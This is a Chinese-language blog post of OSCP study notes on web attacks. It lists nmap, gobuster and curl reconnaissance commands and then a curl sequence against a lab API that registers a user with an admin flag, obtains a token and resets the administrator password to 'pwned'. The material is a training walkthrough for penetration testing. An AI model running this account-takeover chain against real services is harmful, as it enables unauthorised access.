文章总结: 本文介绍了OSCP认证学习中WEB攻击相关内容,重点讲解了WEB分析工具和WEB应用枚举技术。包括使用nmap进行服务指纹识别和HTTP枚举,利用Wappalyzer识别网站技术栈,通过gobuster进行目录枚举,以及API枚举和攻击方法如注册新用户、获取token、修改管理员密码等。文章提供了具体命令示例,适合渗透测试初学者学习WEB安全基础。
综合评分: 83
文章分类: 渗透测试,WEB安全,漏洞分析,红队,安全工具
OSCP | WEB攻击简介
原创
小A法师
高级红队专家
2024年6月24日 12:59
北京
教材和学习方式详见开篇:OSCP学习之路-开篇
本篇对应教材第8章,主要内容“WEB分析工具”和“WEB应用枚举”,记录使用工具和命令
8.2 Web分析工具
1 web服务指纹
nmap扫描web服务
sudo nmap -p80 -sV 192.168.50.20
http枚举
sudo nmap -p80 --script=http-enum 192.168.50.20
2 Wappalyzer
网站
https://www.wappalyzer.com/
3 目录枚举
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
4 Burp
图形界面操作(略)
8.3 Web应用枚举
8.3.2 http头和sitemaps枚举
curl https://www.google.com/robots.txt
8.3.3 API枚举
gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p patterncurl -i http://192.168.50.16:5002/users/v1gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txtcurl -i http://192.168.50.16:5002/users/v1/admin/password# 可能返回错误,一般需要post或者put,前提是要先登录成功curl -i http://192.168.50.16:5002/users/v1/login# 提示用户错误,尝试admin用户curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login# 提示密码不对,注册新用户curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register# 提示需要email,增加email参数再注册curl -d '{"password":"lab","username":"offsec","email":"[email protected]","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register# 注册成功,登录curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login# 登录成功,获得token后,尝试修改admin密码curl \ 'http://192.168.50.16:5002/users/v1/admin/password' \ -H 'Content-Type: application/json' \ -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew' \ -d '{"password": "pwned"}'# 方法不允许,尝试putcurl -X 'PUT' \ 'http://192.168.50.16:5002/users/v1/admin/password' \ -H 'Content-Type: application/json' \ -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \ -d '{"password": "pwned"}'# 修改成功,登录admincurl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login
我在第一篇里提到的一些有价值的认证,还有什么质量高的认证考试我没想到的,可以私我
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:高级红队专家 小A法师《OSCP | WEB攻击简介》